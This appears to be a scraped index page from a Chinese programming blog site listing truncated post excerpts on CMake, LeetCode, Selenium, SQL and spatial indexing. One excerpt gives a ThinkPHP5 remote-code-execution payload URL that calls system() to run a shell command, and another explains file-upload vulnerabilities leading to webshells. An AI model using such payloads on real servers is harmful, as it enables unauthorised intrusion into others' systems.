find_package查找不到eigen3 Could not find apackage configuration file provided by "Eigen3" with any of the followingnames: Eigen3Config.cmake eigen3-confi ...
分类:
其他好文 时间:
2020-03-12 15:55:09
阅读次数:
119
class Solution { public double findMedianSortedArrays(int[] nums1, int[] nums2) { int len1 = nums1.length; int len2 = nums2.length; if (len1 == 0 && l ...
分类:
编程语言 时间:
2020-03-12 14:20:50
阅读次数:
59
1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 ...
分类:
Web程序 时间:
2020-03-12 14:18:31
阅读次数:
97
POI (Point of Interest) A1. GeoHash A2. K-D Tree A3. Space-filling Curve Spatial Indexing Quadtree Hilbert Curves Yelp: find nearest restaurants/...et ...
分类:
其他好文 时间:
2020-03-12 14:15:47
阅读次数:
68
Given a binary search tree, write a function kthSmallest to find the kth smallest element in it. Note:You may assume k is always valid, 1 ≤ k ≤ BST's ...
分类:
其他好文 时间:
2020-03-12 10:13:11
阅读次数:
82
File Upload(文件上传) File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 ...
分类:
Web程序 时间:
2020-03-11 23:45:29
阅读次数:
89
import time from selenium import webdriver ''' 定位一组元素find_eleniums 获取元素属性 .get_attribute('name')补充一下css选择器: id 表示为 # class 表示为 . dir.kw>a ''' driver = ...
分类:
其他好文 时间:
2020-03-11 20:58:53
阅读次数:
77
1.根据a表中的字段col,修改b表中的col UPDATE a INNER JOIN b ON a.id = b.id SET b.col = xx WHERE a.col = xx 2.模糊查询 like 的替换为FIND_IN_SET SELECT * FROM sku a LEFT JOIN ...
分类:
数据库 时间:
2020-03-11 19:32:28
阅读次数:
64
先上题目: C. Two operations time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output You are given an ...
分类:
其他好文 时间:
2020-03-11 19:28:17
阅读次数:
66
1.ID定位 元素id的值在当前整个HTML页面当中是唯一的,所以可以通过id属性来唯一定位这个元素 示例代码: driver.find_element_by_id("kw) 注意有些系统中元素id每次访问都不一样,这种情况下就不适合用id来定位元素。 2.name定位 示例代码: driver.f ...
分类:
其他好文 时间:
2020-03-11 18:14:57
阅读次数:
40